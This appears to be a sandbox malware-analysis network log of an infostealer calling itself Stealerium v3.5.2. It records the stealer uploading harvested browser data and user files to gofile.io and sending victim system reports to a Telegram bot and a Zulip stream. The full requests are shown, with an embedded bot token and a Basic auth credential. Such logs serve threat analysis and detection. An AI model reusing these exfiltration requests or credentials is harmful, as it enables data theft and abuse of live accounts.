                                                                                                                                                                                                                                                          Content-Length: 260
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                          2024-11-29 09:57:15 UTC260INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 37 39 34 34 34 39 38 34 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 74 72 69 6f 74 72 6f 73 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 61 74 72 69 6f 74 70 32 31 30 52 6f 68 73 5f 62 6f 74 22 2c 22 63 61 6e 5f 6a 6f 69 6e 5f 67 72 6f 75 70 73 22 3a 74 72 75 65 2c 22 63 61 6e 5f 72 65 61 64 5f 61 6c 6c 5f 67 72 6f 75 70 5f 6d 65 73 73 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 73 75 70 70 6f 72 74 73 5f 69 6e 6c 69 6e 65 5f 71 75 65 72 69 65 73 22 3a 66 61 6c 73 65 2c 22 63 61 6e 5f 63 6f 6e 6e 65 63 74 5f 74 6f 5f 62 75 73 69 6e 65 73 73 22 3a 66 61 6c 73 65 2c 22 68 61 73 5f 6d 61 69 6e 5f 77 65 62 5f 61 70 70 22 3a 66 61
                                                                                                                                                                                                                                                          Data Ascii: {"ok":true,"result":{"id":7944498476,"is_bot":true,"first_name":"Patriotrosh","username":"Patriotp210Rohs_bot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":fa


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          8192.168.2.44974245.112.123.1264434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:21 UTC70OUTGET /servers HTTP/1.1
                                                                                                                                                                                                                                                          Host: api.gofile.io
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:21 UTC1116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.27.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:21 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 387
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          ETag: W/"183-H+Hlj8zn8rXEzor2CTL15HpbTK0"
                                                                                                                                                                                                                                                          2024-11-29 09:57:21 UTC387INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 36 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 30 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 32 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 5d 2c 22 73 65 72 76 65 72 73 41 6c 6c 5a 6f 6e 65 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 39 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 36 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 33 22 2c 22 7a 6f 6e
                                                                                                                                                                                                                                                          Data Ascii: {"status":"ok","data":{"servers":[{"name":"store6","zone":"eu"},{"name":"store10","zone":"eu"},{"name":"store1","zone":"eu"},{"name":"store2","zone":"eu"}],"serversAllZone":[{"name":"store9","zone":"na"},{"name":"store6","zone":"eu"},{"name":"store3","zon


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          9192.168.2.44974331.14.70.2494434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:23 UTC207OUTPOST /uploadfile HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary="b1c2b79f-406c-402d-977e-4b21d28af094"
                                                                                                                                                                                                                                                          Host: store6.gofile.io
                                                                                                                                                                                                                                                          Content-Length: 121972
                                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC40OUTData Raw: 2d 2d 62 31 63 32 62 37 39 66 2d 34 30 36 63 2d 34 30 32 64 2d 39 37 37 65 2d 34 62 32 31 64 32 38 61 66 30 39 34 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --b1c2b79f-406c-402d-977e-4b21d28af094
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC123OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 6f 6e 65 73 40 37 32 34 35 33 36 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 6a 6f 6e 65 73 25 34 30 37 32 34 35 33 36 5f 65 6e 2d 43 48 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Content-Disposition: form-data; name=file; filename="user@724536_en-CH.zip"; filename*=utf-8''user%40724536_en-CH.zip
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: 50 4b 03 04 14 00 01 08 00 00 27 27 7d 59 00 00 00 00 0c 00 00 00 00 00 00 00 19 00 00 00 42 72 6f 77 73 65 72 73 2f 45 64 67 65 2f 48 69 73 74 6f 72 79 2e 74 78 74 13 a7 e5 81 eb b9 86 2b e9 43 dc 28 50 4b 03 04 14 00 09 08 08 00 27 27 7d 59 71 80 43 5d 74 00 00 00 dc 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 2f 46 69 72 65 66 6f 78 2f 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 55 94 f1 30 4a 16 a7 36 ae 0b 68 bf 86 f3 9d df 2f b1 9f 8c ed 9d bf 5a 32 54 11 e9 64 1e bf 42 1d dc c0 1c d8 e0 63 32 30 a0 2c e4 3b b0 2d c3 16 51 83 c4 e9 ce 6f 89 8e 04 7c b5 a7 a5 a9 f1 a8 50 9f 12 25 1b e4 26 c5 7a 0e 0a 1c a5 d8 52 d3 39 26 fe 37 77 7b 6d 7a 55 6a 04 20 40 12 06 21 9a 03 a8 80 b1 80 7a 98 84 f0 a5 d0 54 eb 52 86 bf d3 cd 50 4b 07 08 71 80 43 5d 74 00 00 00
                                                                                                                                                                                                                                                          Data Ascii: PK''}YBrowsers/Edge/History.txt+C(PK''}YqC]tBrowsers/Firefox/Bookmarks.txtU0J6h/Z2TdBc20,;-Qo|P%&zR9&7w{mzUj @!zTRPKqC]t
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: 44 cf f7 08 db 79 b2 b5 af 5f b9 74 db 28 58 49 06 bf d3 7b c4 df c5 38 91 8f 19 8d b0 f7 4f c0 e2 d5 11 3f b9 d0 b5 2c 84 84 b1 fd cd ba ab d7 2e e8 0a a2 41 8e c3 8e f3 3b da 0f 90 ea 92 0a 9a fa 49 12 a5 02 8e 5e 08 67 86 62 de 67 79 91 6c cf 92 46 a2 20 45 84 e4 4c 25 fe f8 39 e2 7e c4 68 22 71 de 1a df ed 27 d1 6c 2b ad 6c c7 62 2d 37 9f 8f 54 30 72 fb 4d 10 5e ce 9e 77 b8 0d c3 d8 0f bc 41 fc 27 ef 4d a4 32 08 4a 9f 86 cf cf 5a af 38 43 85 e9 04 bc 16 75 67 5b 4a 19 64 0c 63 40 6b de 82 78 7f dd f6 82 95 42 f5 d4 b4 1b f0 54 98 79 bf 8a d3 39 4b 2d f5 ed 20 10 a7 41 b7 92 13 12 a8 d9 a8 df 48 21 cc 30 b8 da 2d c3 16 82 3b 26 05 06 5f 7a 97 9a f3 da 56 9c fe ae cb 34 f8 82 f0 94 f0 f4 51 73 9f f8 d4 65 81 86 9c 1e b2 8a df 64 62 8b 78 78 8d 14 57 27
                                                                                                                                                                                                                                                          Data Ascii: Dy_t(XI{8O?,.A;I^gbgylF EL%9~h"q'l+lb-7T0rM^wA'M2JZ8Cug[Jdc@kxBTy9K- AH!0-;&_zV4QsedbxxW'
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: 65 b2 06 9b 6c 5c b2 5e a2 0c a8 5c ee 5b 69 51 f9 c7 0b 64 26 43 b1 4f e2 5d 5c 1f 74 95 bf 29 c2 60 52 3e 13 34 25 f7 33 50 4b 07 08 43 fa 88 fe 91 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 55 40 44 57 c8 29 ec a0 95 02 00 00 02 04 00 00 33 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 65 73 6b 74 6f 70 2f 57 55 54 4a 53 43 42 43 46 58 2e 64 6f 63 78 23 18 3f ab 71 64 0d f1 ce b4 b2 27 77 ad 37 43 08 5a dc 20 f6 32 70 8e 3b d6 71 31 ef c3 fd 51 f8 a3 da 0d 55 88 0f 26 ae ee f7 f8 e8 7d 2f 04 8a 75 5c 92 65 1f 58 2b be 80 c1 91 1b b0 bf ed 8f 0b d1 37 d0 5d ef 45 17 29 e2 a3 2e ad 2e 2a f8 2b ce 1a 3d 8d 72 7a c7 56 28 1d 88 a8 ca c7 05 f1 10 1e f2 0c cd e7 cc 1b 16 12 83 2b 2c 34 02 0f fd eb 21
                                                                                                                                                                                                                                                          Data Ascii: el\^\[iQd&CO]\t)`R>4%3PKCPKU@DW)3Grabber/DRIVE-C/Users/user/Desktop/WUTJSCBCFX.docx#?qd'w7CZ 2p;q1QU&}/u\eX+7]E)..*+=rzV(+,4!
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: b9 18 e5 a8 7a 4d 82 90 81 11 51 ad 10 2f 57 53 da 7c 74 96 09 a6 ae 28 ad 64 cc 6f 74 31 f0 65 13 f7 be 73 67 4a 2a b5 16 98 c5 97 ba ae aa ba d3 ae 5b e8 e0 ae a5 51 b7 59 34 38 2d 71 3f 7a 82 7a fb 37 89 95 3a 60 4f 70 f7 1c 2e 2a e9 6b b0 cc 94 a9 9a 11 77 bc ad 85 bd b3 0f 25 0e 05 00 10 c3 64 ef d2 a8 d8 65 8e ca cf 1b 19 aa ee 19 22 09 e8 71 fb 46 83 86 d1 73 91 a4 21 db 43 42 c4 00 70 e7 14 ba e7 4f 8f 54 0c bb ad 09 74 ca 7a 9c e6 fa dc 3d db 3a a1 08 9c ba da e4 72 e5 bf fe 71 ed 2e b9 8f d5 41 79 39 77 98 df d4 d3 29 db ef 47 5d cf 12 6c b8 b3 65 98 7d 97 f0 dd c0 49 0a be bf b7 0d 30 cd 73 08 4c 8e 8c e0 18 95 e4 f3 00 94 bc df c1 d6 8d d6 6b 36 e1 f0 b6 60 0f 4d 35 26 d5 5a 40 f7 45 b8 2a a9 ad 4a fb 4a 25 56 25 ee c7 c1 cf a3 7d 8d 9d 96 c3
                                                                                                                                                                                                                                                          Data Ascii: zMQ/WS|t(dot1esgJ*[QY48-q?zz7:`Op.*kw%de"qFs!CBpOTtz=:rq.Ay9w)G]le}I0sLk6`M5&Z@E*JJ%V%}
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: ed 69 1f 8f 6e 0b 63 24 86 0f 34 0c 80 3a b1 ba 97 fb e3 54 d1 0b 6c c9 98 0b 9c 7a ee e7 ae d7 91 f4 80 04 8d 4f 2d b7 f8 59 9b f0 ed 2b f1 a7 2b 6e 0c ac 92 6a 47 b5 f7 6b b2 70 45 96 f9 61 35 66 b5 55 9f 5e ac 77 bb 64 53 31 58 1f b6 41 f8 99 50 7b ed 15 b7 95 ba 5f 4a a4 33 ec b2 bd 13 ba dd d5 56 e4 07 24 2c c5 f1 6a 70 bc e3 31 88 22 67 16 35 9d 71 92 1b c6 98 fc 2a c0 ce b1 65 41 05 42 bf f3 e0 fc b6 3e 45 99 65 41 9e cd f9 f4 8b b7 1a 57 f9 00 59 aa a1 61 ed 7c 57 19 d0 bf a6 ae a4 de 2a 12 e7 a3 da 00 37 04 0d 2e 6d 81 dd 75 fc 33 d0 95 9d 82 58 ca 3d 3e 4c 98 d7 88 d2 7f c9 6b 64 ca f7 98 b9 05 2d cf 94 88 23 f7 de 88 48 ee 71 15 5c 8e 06 1f 29 6c 15 b2 c8 b2 2c e7 52 0b 5a 65 e3 27 0a 3e b4 50 4b 07 08 2a 68 af 6f 92 02 00 00 02 04 00 00 50 4b
                                                                                                                                                                                                                                                          Data Ascii: inc$4:TlzO-Y++njGkpEa5fU^wdS1XAP{_J3V$,jp1"g5q*eAB>EeAWYa|W*7.mu3X=>Lkd-#Hq\)l,RZe'>PK*hoPK
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 4a 53 44 4e 47 59 43 4f 57 59 2e 78 6c 73 78 ad 71 a7 55 64 30 bb 31 5c 48 92 fa 42 86 c8 04 f7 ee ce 1d 95 e5 0b 7a 3d bb 3a 56 a7 57 26 ae 1e 98 1f 9f ec e1 86 5f 90 5a b5 d3 69 0e 5f be 93 51 10 53 30 a9 66 a7 d3 20 e3 fb 2c 8e 90 a9 4e c4 2c 2d 68 f0 52 59 ec 2b f2 26 36 f7 47 51 4f fe a8 43 6d c5 1e 04 89 03 bf bd 75 6d 98 e6 c8 47 ff c1 d4 4e 4f 7a b2 88 4c a1 17 b9 5c 1f ca 1f db 89 2c 20 45 96 75 49 a0 ab 4d 71 4e 17 d4 aa 9e 28 6d 5d d4 e0 cd 6f 24 1f dc ba b0 73 f5 58 51 f3 22 1c ac 63 3e bd 78 87 29 e6 0d 28 48 25 db f5 12 4c 63 d7 8a f0 5e 1d 2c 84 0c 28 8e b5 5a 00 7d 03 7c b7 61 c6 49 fa a2 92 94 36 f9 5a 6d 03 f4 df ca 34 c6 35 c5 64 1d 5d 60 5f fa d0
                                                                                                                                                                                                                                                          Data Ascii: DRIVE-C/Users/user/Documents/JSDNGYCOWY.xlsxqUd01\HBz=:VW&_Zi_QS0f ,N,-hRY+&6GQOCmumGNOzL\, EuIMqN(m]o$sXQ"c>x)(H%Lc^,(Z}|aI6Zm45d]`_
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: 92 3e ec bd 5c c5 e2 b7 29 ee 47 d8 35 99 20 99 a4 aa 41 ae 5b af b0 4a b4 53 04 e8 8b 42 4c 59 ad 34 d1 47 71 17 22 d6 86 90 64 05 51 79 c9 71 fa 90 d5 c1 62 0c b1 63 cd 27 02 7e 67 b7 86 6a 13 73 9a ad a9 43 0e 0e 7e fd 24 9d 3d a4 79 83 ef b7 a6 e8 37 04 63 e7 09 ba 60 94 5a 2d 8d b1 e5 47 47 83 ce b2 68 32 8b f4 ef 31 b1 77 07 5d 86 b3 13 d7 2e 8e 66 4b 34 07 ea cf e4 5b 39 57 c9 5e fd e1 83 42 7d 66 7c 46 45 4c 14 e6 e6 77 6c 77 f4 45 99 d5 73 7a b8 51 8c e9 1c df 10 f4 be 7f f1 2f 1d 33 6f a4 f5 79 3b 07 8b 3f 47 a1 a8 28 4f 0b d1 6c 4c 92 81 85 c7 da bb 4a cc bd 8a 56 b2 04 e8 0c 2b 6a 1f e2 5f ec 17 82 e6 f9 41 a0 25 8d f1 b4 88 c3 f8 89 57 73 60 f5 18 bb 39 f5 6e ed d3 16 db 72 be 2f 5b 99 3c 1d 3b 9e bb c9 31 33 49 f3 c4 a6 e4 b3 32 29 81 5f be
                                                                                                                                                                                                                                                          Data Ascii: >\)G5 A[JSBLY4Gq"dQyqbc'~gjsC~$=y7c`Z-GGh21w].fK4[9W^B}f|FELwlwEszQ/3oy;?G(OlLJV+j_A%Ws`9nr/[<;13I2)_
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC4096OUTData Raw: 9e 85 a7 ae 0b 91 2b 1e e4 cf a0 a7 2e 7e d4 48 87 5f dc f3 f5 f6 bb 2a 68 a1 0b 51 b4 55 6c 49 a9 be 66 0a 3a 30 38 91 2b 7d 79 1c 34 ad ca d6 87 4d 45 af 31 fa e5 5f 8a 97 0d 37 c6 21 75 39 00 11 b6 5e e7 16 2c 34 84 86 37 2a 58 ef 91 a9 ba 9f a4 ba 63 52 c9 b0 7c 63 b5 be 07 27 ae 67 f2 4a b8 4c 3b 54 f4 52 4d 2a f2 c9 10 31 c0 6e aa 32 41 02 1d df 50 4b 07 08 c8 29 ec a0 95 02 00 00 02 04 00 00 50 4b 03 04 14 00 09 08 08 00 55 40 44 57 54 2f ec ed 92 02 00 00 02 04 00 00 40 00 00 00 47 72 61 62 62 65 72 2f 44 52 49 56 45 2d 43 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 57 55 54 4a 53 43 42 43 46 58 2f 59 50 53 49 41 43 48 59 58 57 2e 78 6c 73 78 71 7e 17 26 32 53 fa 91 68 b5 92 c4 73 c8 0b b2 c1 86 b6 f1 fb fc 90 cf 66 a6 60
                                                                                                                                                                                                                                                          Data Ascii: +.~H_*hQUlIf:08+}y4ME1_7!u9^,47*XcR|c'gJL;TRM*1n2APK)PKU@DWT/@Grabber/DRIVE-C/Users/user/Documents/WUTJSCBCFX/YPSIACHYXW.xlsxq~&2Shsf`
                                                                                                                                                                                                                                                          2024-11-29 09:57:24 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                                          2024-11-29 09:57:25 UTC888INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.27.1
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:25 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 439
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                                                                          {"data":{"createTime":1732874245,"downloadPage":"https://gofile.io/d/liMaKC","guestToken":"IfFiIhbRmeAO6lmgxxDEq63xzBhnkCqa","id":"8ec4b468-6234-4583-899e-187582c93c4e","md5":"32a27034121055815bac17aef7ffe522","mimetype":"application/zip","modTime":1732874245,"name":"user@724536_en-CH.zip","parentFolder":"c420f31b-7cd7-4547-b94f-38d93a580f30","parentFolderCode":"liMaKC","servers":["store6"],"size":121765,"type":"file"},"status":"ok"}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          10192.168.2.449748149.154.167.2204434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:29 UTC2142OUTGET /bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556397073&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%204%3A57%3A07%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20724536%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20PA_NMRCU%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28N [TRUNCATED]
                                                                                                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:29 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:29 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 1680
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                          2024-11-29 09:57:29 UTC1680INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 34 34 34 39 38 34 37 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 74 72 69 6f 74 72 6f 73 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 61 74 72 69 6f 74 70 32 31 30 52 6f 68 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 36 33 39 37 30 37 33 2c 22 74 69 74 6c 65 22 3a 22 52 6f 68 73 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 38 37 34 32 34 39 2c 22 74 65 78 74
                                                                                                                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":1392,"from":{"id":7944498476,"is_bot":true,"first_name":"Patriotrosh","username":"Patriotp210Rohs_bot"},"chat":{"id":-4556397073,"title":"Rohs","type":"group","all_members_are_administrators":true},"date":1732874249,"text


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          11192.168.2.44975150.17.0.114434828C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-11-29 09:57:31 UTC278OUTPOST /api/v1/messages HTTP/1.1
                                                                                                                                                                                                                                                          Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM=
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: szurubooru.zulipchat.com
                                                                                                                                                                                                                                                          Content-Length: 1691
                                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-11-29 09:57:32 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                                          2024-11-29 09:57:32 UTC1691OUTData Raw: 74 79 70 65 3d 73 74 72 65 61 6d 26 74 6f 3d 53 7a 75 72 75 62 6f 6f 72 75 26 74 6f 70 69 63 3d 6a 6f 6e 65 73 26 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 25 30 41 25 46 30 25 39 46 25 39 38 25 42 39 2b 25 32 41 53 74 65 61 6c 65 72 69 75 6d 2b 76 33 2e 35 2e 32 2b 2d 2b 52 65 70 6f 72 74 25 33 41 25 32 41 25 30 41 44 61 74 65 25 33 41 2b 32 30 32 34 2d 31 31 2d 32 39 2b 34 25 33 41 35 37 25 33 41 30 37 2b 61 6d 25 30 41 53 79 73 74 65 6d 25 33 41 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 2b 25 32 38 36 34 2b 42 69 74 25 32 39 25 30 41 55 73 65 72 6e 61 6d 65 25 33 41 2b 6a 6f 6e 65 73 25 30 41 43 6f 6d 70 4e 61 6d 65 25 33 41 2b 37 32 34 35 33 36 25 30 41 4c 61 6e 67 75 61 67 65 25 33 41 2b 25 46 30 25 39 46 25
                                                                                                                                                                                                                                                          Data Ascii: type=stream&to=Szurubooru&topic=user&content=%60%60%60%0A%F0%9F%98%B9+%2AStealerium+v3.5.2+-+Report%3A%2A%0ADate%3A+2024-11-29+4%3A57%3A07+am%0ASystem%3A+Microsoft+Windows+10+Pro+%2864+Bit%29%0AUsername%3A+user%0ACompName%3A+724536%0ALanguage%3A+%F0%9F%
                                                                                                                                                                                                                                                          2024-11-29 09:57:32 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 29 Nov 2024 09:57:32 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 81
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Expires: Fri, 29 Nov 2024 09:57:32 GMT
                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                          X-RateLimit-Limit: 200
                                                                                                                                                                                                                                                          X-RateLimit-Remaining: 197
                                                                                                                                                                                                                                                          X-RateLimit-Reset: 1732874312
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, DELETE, PUT, PATCH, HEAD
                                                                                                                                                                                                                                                          {"result":"success","msg":"","id":485061621,"automatic_new_visibility_policy":3}


